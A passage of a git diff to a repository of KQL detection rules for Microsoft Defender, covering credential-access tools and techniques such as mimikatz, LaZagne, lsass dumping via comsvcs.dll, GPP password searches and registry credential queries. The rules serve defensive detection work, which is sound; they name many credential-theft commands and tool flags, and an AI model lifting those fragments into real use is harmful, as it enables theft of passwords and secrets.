or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\" or ProcessCommandLine contains "\\Software\\Sota\\FFFTP" or ProcessCommandLine contains "\\Software\\TightVNC\\Server" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin") and (not(((ProcessCommandLine contains "export" or ProcessCommandLine contains "save") and FolderPath endswith "reg.exe"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql b/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql index f5d364c4..50aa7bd6 100644 --- a/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql +++ b/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql @@ -1,12 +1,12 @@ -// Title: Enumeration for Credentials in Registry -// Author: frack113 -// Date: 2021-12-20 -// Level: medium -// Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials. -// The Windows Registry stores configuration information that can be used by the system or other programs. -// Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.002 - -DeviceProcessEvents +// Title: Enumeration for Credentials in Registry +// Author: frack113 +// Date: 2021-12-20 +// Level: medium +// Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials. +// The Windows Registry stores configuration information that can be used by the system or other programs. +// Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.002 + +DeviceProcessEvents | where ((ProcessCommandLine contains " query " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_SZ" and ProcessCommandLine contains "/s") and FolderPath endswith "\\reg.exe") and ((ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKLM") or (ProcessCommandLine contains "/f " and ProcessCommandLine contains "HKCU") or ProcessCommandLine contains "HKCU\\Software\\SimonTatham\\PuTTY\\Sessions") \ No newline at end of file diff --git a/KQL/rules/Credential Access/esentutl_gather_credentials.kql b/KQL/rules/Credential Access/esentutl_gather_credentials.kql index 2acd3ec5..109dcafe 100644 --- a/KQL/rules/Credential Access/esentutl_gather_credentials.kql +++ b/KQL/rules/Credential Access/esentutl_gather_credentials.kql @@ -1,12 +1,12 @@ -// Title: Esentutl Gather Credentials -// Author: sam0x90 -// Date: 2021-08-06 -// Level: medium -// Description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003, attack.t1003.003, attack.s0404 -// False Positives: -// - To be determined - -DeviceProcessEvents +// Title: Esentutl Gather Credentials +// Author: sam0x90 +// Date: 2021-08-06 +// Level: medium +// Description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003, attack.t1003.003, attack.s0404 +// False Positives: +// - To be determined + +DeviceProcessEvents | where ProcessCommandLine contains "esentutl" and ProcessCommandLine contains " /p" \ No newline at end of file diff --git a/KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql b/KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql index 42aee421..46e5d83f 100644 --- a/KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql +++ b/KQL/rules/Credential Access/esentutl_volume_shadow_copy_service_keys.kql @@ -1,10 +1,10 @@ -// Title: Esentutl Volume Shadow Copy Service Keys -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-10-20 -// Level: high -// Description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.002 - -DeviceRegistryEvents +// Title: Esentutl Volume Shadow Copy Service Keys +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-20 +// Level: high +// Description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002 + +DeviceRegistryEvents | where (InitiatingProcessFolderPath endswith "esentutl.exe" and RegistryKey contains "System\\CurrentControlSet\\Services\\VSS") and (not(RegistryKey contains "System\\CurrentControlSet\\Services\\VSS\\Start")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql b/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql index e7d9fa9d..622f8b7a 100644 --- a/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql +++ b/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql @@ -1,15 +1,15 @@ -// Title: File Access Of Signal Desktop Sensitive Data -// Author: Andreas Braathen (mnemonic.io) -// Date: 2025-10-19 -// Level: medium -// Description: Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json. -// The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data. -// Since the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the users credentials. -// Currently the rule only covers the default Signal installation path in AppData\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003 -// False Positives: -// - Unlikely, but possible from AV or backup software accessing the files. - -DeviceRegistryEvents +// Title: File Access Of Signal Desktop Sensitive Data +// Author: Andreas Braathen (mnemonic.io) +// Date: 2025-10-19 +// Level: medium +// Description: Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json. +// The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data. +// Since the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the users credentials. +// Currently the rule only covers the default Signal installation path in AppData\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 +// False Positives: +// - Unlikely, but possible from AV or backup software accessing the files. + +DeviceRegistryEvents | where (RegistryKey endswith "\\AppData\\Roaming\\Signal*" and (RegistryKey endswith "\\config.json" or RegistryKey endswith "\\db.sqlite")) and (not((InitiatingProcessFolderPath endswith "\\signal-portable.exe" or InitiatingProcessFolderPath endswith "\\signal.exe"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/findstr_gpp_passwords.kql b/KQL/rules/Credential Access/findstr_gpp_passwords.kql index 2f0fe3c9..1e6dc976 100644 --- a/KQL/rules/Credential Access/findstr_gpp_passwords.kql +++ b/KQL/rules/Credential Access/findstr_gpp_passwords.kql @@ -1,10 +1,10 @@ -// Title: Findstr GPP Passwords -// Author: frack113 -// Date: 2021-12-27 -// Level: high -// Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.006 - -DeviceProcessEvents +// Title: Findstr GPP Passwords +// Author: frack113 +// Date: 2021-12-27 +// Level: high +// Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.006 + +DeviceProcessEvents | where (ProcessCommandLine contains "cpassword" and ProcessCommandLine contains "\\sysvol\\" and ProcessCommandLine contains ".xml") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql b/KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql index 67ec6831..44253237 100644 --- a/KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql +++ b/KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql @@ -1,10 +1,10 @@ -// Title: HackTool - CrackMapExec File Indicators -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-03-11 -// Level: high -// Description: Detects file creation events with filename patterns used by CrackMapExec. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 - -DeviceFileEvents +// Title: HackTool - CrackMapExec File Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-03-11 +// Level: high +// Description: Detects file creation events with filename patterns used by CrackMapExec. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 + +DeviceFileEvents | where FolderPath startswith "C:\\Windows\\Temp\\" and ((FolderPath matches regex "\\\\[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\.txt$" or FolderPath matches regex "\\\\[a-zA-Z]{8}\\.tmp$") or (FolderPath endswith "\\temp.ps1" or FolderPath endswith "\\msol.ps1")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql b/KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql index 83fdab97..8ba0548f 100644 --- a/KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql +++ b/KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql @@ -1,10 +1,10 @@ -// Title: HackTool - CrackMapExec Process Patterns -// Author: Florian Roth (Nextron Systems) -// Date: 2022-03-12 -// Level: high -// Description: Detects suspicious process patterns found in logs when CrackMapExec is used -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 - -DeviceProcessEvents +// Title: HackTool - CrackMapExec Process Patterns +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-12 +// Level: high +// Description: Detects suspicious process patterns found in logs when CrackMapExec is used +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 + +DeviceProcessEvents | where ((ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k ") and (ProcessCommandLine contains "tasklist /fi " and ProcessCommandLine contains "Imagename eq lsass.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) or (ProcessCommandLine contains "do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump" and ProcessCommandLine contains "\\Windows\\Temp\\" and ProcessCommandLine contains " full" and ProcessCommandLine contains "%%B") or (ProcessCommandLine contains "tasklist /v /fo csv" and ProcessCommandLine contains "findstr /i \"lsass\"") \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql b/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql index 0dfcd2dc..9c78eb72 100644 --- a/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql +++ b/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Dumpert Process Dumper Default File -// Author: Florian Roth (Nextron Systems) -// Date: 2020-02-04 -// Level: critical -// Description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 -// False Positives: -// - Very unlikely - -DeviceFileEvents +// Title: HackTool - Dumpert Process Dumper Default File +// Author: Florian Roth (Nextron Systems) +// Date: 2020-02-04 +// Level: critical +// Description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Very unlikely + +DeviceFileEvents | where FolderPath endswith "dumpert.dmp" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql b/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql index c57008c1..42b6687c 100644 --- a/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql +++ b/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Dumpert Process Dumper Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2020-02-04 -// Level: critical -// Description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 -// False Positives: -// - Very unlikely - -DeviceProcessEvents +// Title: HackTool - Dumpert Process Dumper Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2020-02-04 +// Level: critical +// Description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Very unlikely + +DeviceProcessEvents | where MD5 startswith "09D278F9DE118EF09163C6140255C690" or ProcessCommandLine contains "Dumpert.dll" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql b/KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql index e4f6d8f5..0ef97169 100644 --- a/KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql +++ b/KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql @@ -1,12 +1,12 @@ -// Title: Hacktool Execution - PE Metadata -// Author: Florian Roth (Nextron Systems) -// Date: 2022-04-27 -// Level: high -// Description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.resource-development, attack.t1588.002, attack.t1003 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Hacktool Execution - PE Metadata +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-27 +// Level: high +// Description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.resource-development, attack.t1588.002, attack.t1003 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessVersionInfoCompanyName =~ "Cube0x0" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql b/KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql index b406a4b5..d375b4e9 100644 --- a/KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql +++ b/KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Hashcat Password Cracker Execution -// Author: frack113 -// Date: 2021-12-27 -// Level: high -// Description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1110.002 -// False Positives: -// - Tools that use similar command line flags and values - -DeviceProcessEvents +// Title: HackTool - Hashcat Password Cracker Execution +// Author: frack113 +// Date: 2021-12-27 +// Level: high +// Description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1110.002 +// False Positives: +// - Tools that use similar command line flags and values + +DeviceProcessEvents | where (ProcessCommandLine contains "-a " and ProcessCommandLine contains "-m 1000 " and ProcessCommandLine contains "-r ") or FolderPath endswith "\\hashcat.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql b/KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql index cb8dc0bd..8de64364 100644 --- a/KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql +++ b/KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Hydra Password Bruteforce Execution -// Author: Vasiliy Burov -// Date: 2020-10-05 -// Level: high -// Description: Detects command line parameters used by Hydra password guessing hack tool -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1110, attack.t1110.001 -// False Positives: -// - Software that uses the caret encased keywords PASS and USER in its command line - -DeviceProcessEvents +// Title: HackTool - Hydra Password Bruteforce Execution +// Author: Vasiliy Burov +// Date: 2020-10-05 +// Level: high +// Description: Detects command line parameters used by Hydra password guessing hack tool +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1110, attack.t1110.001 +// False Positives: +// - Software that uses the caret encased keywords PASS and USER in its command line + +DeviceProcessEvents | where (ProcessCommandLine contains "^USER^" or ProcessCommandLine contains "^PASS^") and (ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ") \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql b/KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql index 8210e8f2..677c2742 100644 --- a/KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql +++ b/KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql @@ -1,10 +1,10 @@ -// Title: HackTool - Impacket File Indicators -// Author: The DFIR Report, IrishDeath -// Date: 2025-05-19 -// Level: high -// Description: Detects file creation events with filename patterns used by Impacket. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 - -DeviceFileEvents +// Title: HackTool - Impacket File Indicators +// Author: The DFIR Report, IrishDeath +// Date: 2025-05-19 +// Level: high +// Description: Detects file creation events with filename patterns used by Impacket. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 + +DeviceFileEvents | where FolderPath matches regex "\\\\sessionresume_[a-zA-Z]{8}$" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_inveigh_execution.kql b/KQL/rules/Credential Access/hacktool_inveigh_execution.kql index dedcb6d2..22c86a54 100644 --- a/KQL/rules/Credential Access/hacktool_inveigh_execution.kql +++ b/KQL/rules/Credential Access/hacktool_inveigh_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Inveigh Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-24 -// Level: critical -// Description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 -// False Positives: -// - Very unlikely - -DeviceProcessEvents +// Title: HackTool - Inveigh Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-24 +// Level: critical +// Description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Very unlikely + +DeviceProcessEvents | where FolderPath endswith "\\Inveigh.exe" or (ProcessVersionInfoOriginalFileName in~ ("\\Inveigh.exe", "\\Inveigh.dll")) or ProcessVersionInfoFileDescription =~ "Inveigh" or (ProcessCommandLine contains " -SpooferIP" or ProcessCommandLine contains " -ReplyToIPs " or ProcessCommandLine contains " -ReplyToDomains " or ProcessCommandLine contains " -ReplyToMACs " or ProcessCommandLine contains " -SnifferIP") \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_krbrelay_execution.kql b/KQL/rules/Credential Access/hacktool_krbrelay_execution.kql index a733abc0..49d8fb86 100644 --- a/KQL/rules/Credential Access/hacktool_krbrelay_execution.kql +++ b/KQL/rules/Credential Access/hacktool_krbrelay_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - KrbRelay Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-04-27 -// Level: high -// Description: Detects the use of KrbRelay, a Kerberos relaying tool -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1558.003 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - KrbRelay Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-27 +// Level: high +// Description: Detects the use of KrbRelay, a Kerberos relaying tool +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1558.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains " -spn " and ProcessCommandLine contains " -clsid " and ProcessCommandLine contains " -rbcd ") or (ProcessCommandLine contains "shadowcred" and ProcessCommandLine contains "clsid" and ProcessCommandLine contains "spn") or (ProcessCommandLine contains "spn " and ProcessCommandLine contains "session " and ProcessCommandLine contains "clsid ") or (FolderPath endswith "\\KrbRelay.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelay.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_lazagne_execution.kql b/KQL/rules/Credential Access/hacktool_lazagne_execution.kql index a266e7c9..1a421573 100644 --- a/KQL/rules/Credential Access/hacktool_lazagne_execution.kql +++ b/KQL/rules/Credential Access/hacktool_lazagne_execution.kql @@ -1,13 +1,13 @@ -// Title: HackTool - LaZagne Execution -// Author: Nasreddine Bencherchali, Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2024-06-24 -// Level: medium -// Description: Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer. -// LaZagne has been leveraged multiple times by threat actors in order to dump credentials. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access -// False Positives: -// - Some false positive is expected from tools with similar command line flags. - -DeviceProcessEvents +// Title: HackTool - LaZagne Execution +// Author: Nasreddine Bencherchali, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2024-06-24 +// Level: medium +// Description: Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer. +// LaZagne has been leveraged multiple times by threat actors in order to dump credentials. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access +// False Positives: +// - Some false positive is expected from tools with similar command line flags. + +DeviceProcessEvents | where (((ProcessCommandLine endswith ".exe all" or ProcessCommandLine endswith ".exe browsers" or ProcessCommandLine endswith ".exe chats" or ProcessCommandLine endswith ".exe databases" or ProcessCommandLine endswith ".exe games" or ProcessCommandLine endswith ".exe git" or ProcessCommandLine endswith ".exe mails" or ProcessCommandLine endswith ".exe maven" or ProcessCommandLine endswith ".exe memory" or ProcessCommandLine endswith ".exe multimedia" or ProcessCommandLine endswith ".exe sysadmin" or ProcessCommandLine endswith ".exe unused" or ProcessCommandLine endswith ".exe wifi" or ProcessCommandLine endswith ".exe windows") and (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Tmp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\$Recycle.bin" or FolderPath contains "\\AppData\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Favorites\\" or FolderPath contains "\\Links\\" or FolderPath contains "\\Music\\" or FolderPath contains "\\Photos\\" or FolderPath contains "\\Pictures\\" or FolderPath contains "\\Saved Games\\" or FolderPath contains "\\Searches\\" or FolderPath contains "\\Users\\Contacts\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\Searches\\" or FolderPath contains "\\Videos\\" or FolderPath contains "\\Windows\\addins\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\IME\\")) or FolderPath endswith "\\lazagne.exe") or ((ProcessCommandLine contains " all " or ProcessCommandLine contains " browsers " or ProcessCommandLine contains " chats " or ProcessCommandLine contains " databases " or ProcessCommandLine contains " games " or ProcessCommandLine contains " mails " or ProcessCommandLine contains " maven " or ProcessCommandLine contains " memory " or ProcessCommandLine contains " multimedia " or ProcessCommandLine contains " php " or ProcessCommandLine contains " svn " or ProcessCommandLine contains " sysadmin " or ProcessCommandLine contains " unused " or ProcessCommandLine contains " wifi ") and (ProcessCommandLine contains "-1Password" or ProcessCommandLine contains "-apachedirectorystudio" or ProcessCommandLine contains "-autologon" or ProcessCommandLine contains "-ChromiumBased" or ProcessCommandLine contains "-coreftp" or ProcessCommandLine contains "-credfiles" or ProcessCommandLine contains "-credman" or ProcessCommandLine contains "-cyberduck" or ProcessCommandLine contains "-dbvis" or ProcessCommandLine contains "-EyeCon" or ProcessCommandLine contains "-filezilla" or ProcessCommandLine contains "-filezillaserver" or ProcessCommandLine contains "-ftpnavigator" or ProcessCommandLine contains "-galconfusion" or ProcessCommandLine contains "-gitforwindows" or ProcessCommandLine contains "-hashdump" or ProcessCommandLine contains "-iisapppool" or ProcessCommandLine contains "-IISCentralCertP" or ProcessCommandLine contains "-kalypsomedia" or ProcessCommandLine contains "-keepass" or ProcessCommandLine contains "-keepassconfig" or ProcessCommandLine contains "-lsa_secrets" or ProcessCommandLine contains "-mavenrepositories" or ProcessCommandLine contains "-memory_dump" or ProcessCommandLine contains "-Mozilla" or ProcessCommandLine contains "-mRemoteNG" or ProcessCommandLine contains "-mscache" or ProcessCommandLine contains "-opensshforwindows" or ProcessCommandLine contains "-openvpn" or ProcessCommandLine contains "-outlook" or ProcessCommandLine contains "-pidgin" or ProcessCommandLine contains "-postgresql" or ProcessCommandLine contains "-psi-im" or ProcessCommandLine contains "-puttycm" or ProcessCommandLine contains "-pypykatz" or ProcessCommandLine contains "-Rclone" or ProcessCommandLine contains "-rdpmanager" or ProcessCommandLine contains "-robomongo" or ProcessCommandLine contains "-roguestale" or ProcessCommandLine contains "-skype" or ProcessCommandLine contains "-SQLDeveloper" or ProcessCommandLine contains "-squirrel" or ProcessCommandLine contains "-tortoise" or ProcessCommandLine contains "-turba" or ProcessCommandLine contains "-UCBrowser" or ProcessCommandLine contains "-unattended" or ProcessCommandLine contains "-vault" or ProcessCommandLine contains "-vaultfiles" or ProcessCommandLine contains "-vnc" or ProcessCommandLine contains "-winscp")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_mimikatz_execution.kql b/KQL/rules/Credential Access/hacktool_mimikatz_execution.kql index 176f3c7c..51120b1c 100644 --- a/KQL/rules/Credential Access/hacktool_mimikatz_execution.kql +++ b/KQL/rules/Credential Access/hacktool_mimikatz_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Mimikatz Execution -// Author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton -// Date: 2019-10-22 -// Level: high -// Description: Detection well-known mimikatz command line arguments -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001, attack.t1003.002, attack.t1003.004, attack.t1003.005, attack.t1003.006 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - Mimikatz Execution +// Author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton +// Date: 2019-10-22 +// Level: high +// Description: Detection well-known mimikatz command line arguments +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001, attack.t1003.002, attack.t1003.004, attack.t1003.005, attack.t1003.006 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "::aadcookie" or ProcessCommandLine contains "::detours" or ProcessCommandLine contains "::memssp" or ProcessCommandLine contains "::mflt" or ProcessCommandLine contains "::ncroutemon" or ProcessCommandLine contains "::ngcsign" or ProcessCommandLine contains "::printnightmare" or ProcessCommandLine contains "::skeleton" or ProcessCommandLine contains "::preshutdown" or ProcessCommandLine contains "::mstsc" or ProcessCommandLine contains "::multirdp") or (ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "crypto::" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "process::" or ProcessCommandLine contains "vault::") or (ProcessCommandLine contains "DumpCreds" or ProcessCommandLine contains "mimikatz") \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql b/KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql index 61235ab3..b4b1fb24 100644 --- a/KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql +++ b/KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Mimikatz Kirbi File Creation -// Author: Florian Roth (Nextron Systems), David ANDRE -// Date: 2021-11-08 -// Level: critical -// Description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1558 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: HackTool - Mimikatz Kirbi File Creation +// Author: Florian Roth (Nextron Systems), David ANDRE +// Date: 2021-11-08 +// Level: critical +// Description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1558 +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath endswith ".kirbi" or FolderPath endswith "mimilsa.log" \ No newline at end of file diff --git a/KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql b/KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql index 2496574f..c040e029 100644 --- a/KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql +++ b/KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql @@ -1,10 +1,10 @@ -// Title: HackTool - NPPSpy Hacktool Usage -// Author: Florian Roth (Nextron Systems) -// Date: 2021-11-29 -// Level: high -// Description: Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file -// MITRE Tactic: Credential Access -// Tags: attack.credential-access - -DeviceFileEvents +// Title: HackTool - NPPSpy Hacktool Usage +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-29 +// Level: high +// Description: Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file 